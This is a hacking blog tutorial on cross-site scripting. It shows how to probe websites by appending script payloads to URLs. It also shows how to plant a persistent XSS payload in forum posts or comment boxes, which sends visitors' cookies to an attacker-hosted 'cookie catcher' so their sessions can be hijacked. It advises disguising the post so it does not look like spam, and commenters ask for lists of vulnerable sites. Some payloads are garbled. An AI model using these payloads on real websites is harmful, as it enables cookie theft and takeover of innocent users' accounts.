I have already posted about How to Hack Website Completely using SQL Injection and I have also posted a Video Tutorial on it.Today I am going to start on XSS.I know most of the guys don't know even about its name so I am gonna start it from very basics to give you the whole concept of it .Hope you guys like it .
Introduction of XSS
- XSS attack is used to hack websites online and it mostly works on those sites which use cookies for storing your username and password when you log in that site.Check this Wikipedia article for knowing what are cookies.
- XSS usually works on those sites which allows users to add any code in an open place like starting new thread in forums or can send codes using messages to other members.It is actually a script / a code which attacker submit and whoever clicks or even see it got affected .
- The purpose of the attacker or hacker doing XSS is to steal the cookie of a user, which is currently log in on that site and viewing that code submitted by the hacker, so that he can later use that cookie to get into his account . (Steal in this context means just get a copy of cookie, rather than removing the original cookie).
For Example : User A log in on a site and user B use XSS attack and gets the cookie of user A , now user B can easily come into the account of user A using these cookies ..... :))
Finding a XSS Vulnerable sites:
- First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
- To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :
Code:"><script>alertundefineddocument.cookie)</script>
Code:'><script>alertundefineddocument.cookie)</script>
Code:"><script>alertundefined"Test")</script>
Code:'><script>alertundefined"Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:"><body bgcolor="FF0000"></body>
Code:"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>
- After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
- Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site.
Types of XSS Attack
- There are two types of mostly used XSS attacks named :
- Persistent XSS
- Non-Persistent XSS
Persistent XSS:
- This is the first type of XSS.In this method we will steal the victim's cookies with no suspect on us.
- So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
- So now lets try to grab it's cookies.
- First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
- Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:
Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
- Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
- Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php
- Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html
- Now save these cookies as we gonna use them to hijack session of victim.... ;)
Update : I have posted the the second part of this tutorial named Hack Website using XSS Attack - Non Persistent Method.
Subscribe To Get FREE Tutorials!
Respected Readers:
|
6 comments:
Add the complete tutorial man, curious to learn it asap
Sounds good! I'll like to give it a shot
@Sheharyar ya man I will explain everything related to it .... have a little patience as I have to write the tutorial so its really very difficult and takes time .... :))
@fotograf nunta ya its worth giving a shot man .... ;))
pls post video tutorial on xss attack...........post some sites vurnable to xss......
i didnt find site to xss
last step is nt working.........
Confused? Feel free to ask
Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Post a CommentNote:-
Please do not spam Spam comments will be deleted immediately upon my review.
Regards,
XEO Hacker